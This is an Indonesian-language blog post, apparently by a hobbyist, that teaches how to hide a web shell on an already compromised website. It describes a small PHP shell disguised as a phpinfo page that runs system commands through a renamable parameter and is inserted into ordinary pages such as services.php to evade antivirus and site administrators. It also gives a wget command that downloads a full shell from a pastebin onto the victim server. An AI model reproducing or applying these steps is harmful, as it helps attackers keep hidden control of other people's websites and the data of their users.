hallo agan, assalamualaikum, selamat malam agan semua, bagaimana kabar kalian? semoga baik-baik saja ya, sudah lama banget ane kagak update blog, padahal materi udah lumayan, ya, tapi karena sibuk di kuliah, hehehe.
oke, pada malam ini, ane mau berbagi sedikit ilmu hitam, kalian sudah tahu web shell kan? iya, semacam WSO, galer, indoxploit shell, betak, dan lain sebagainya. yak, shell memang sering memudahkan para attacker maupun pentester untuk menggali informasi, memodifikasi, dan lain sebagainya pada website yang diserang.
tapi sayang, beberapa web shell kadang langsung terdeteksi sebagai virus, oleh antivirus PC, maupun antivirus server, dan juga dapat di kenali oleh admin website.
jadi sekarang ini, ane mau berbagi informasi mengenai cara menyembunyikan webshell di website, oke langsung saja.
alat dan bahan :
1. kopi panas
2. koneksi internet
3. website yang sudah ditanami shell
pembahasan :
oke gan, ini adalah shell super simple, dimana tampilannya adalah php info, tahukan php info? yap, informasi mengenai php di server. kemudian jika di beri parameter ?cmd maka akan keluar form, yang mana ente bisa memasukan command sistem, seperti ls, wget, uname, dan lain-lain. ini source code nya :
pada bagian if(isset($_REQUEST['cmd'])) , cmd bisa kalian ganti dengan apapun, misal bakso ataupun ganteng, terserah, maka pemanggilannya adalah php_info.php?ganteng atau php_info.php?bakso.
jika di rasa shell tersebut masih cukup kurang aman, shell dapat di sembunyikan kedalam file php yang normal, contoh about.php pada website atau index.php, atau service.php, atau yang lain.
sebagai contoh ane masukin ke file services.php yang berisi informasi di website korban.
caranya adalah, taruh kode di bawah ini, di atas </body>
maka hasilnya seperti ini,
dan ini bebas dari antivirus, telah ane test di virustotal, dan coba upload di cpanel.
mungkin shell ini adalah mode 'sleep' dari exploit kalian, jadi jika kalian masih ingin menggunakan shell biasa seperti wso, galer, indoxploit shell, tinggal menggunakan command seperti ini 'wget http://pastebin.com/raw/shellmu -O shell.php' pada bagian pastebin bisa di ganti alamat pastebin shell mu dalam mode raw, maka shell.php akan menjadi shellmu.
0 comments:
Post a Comment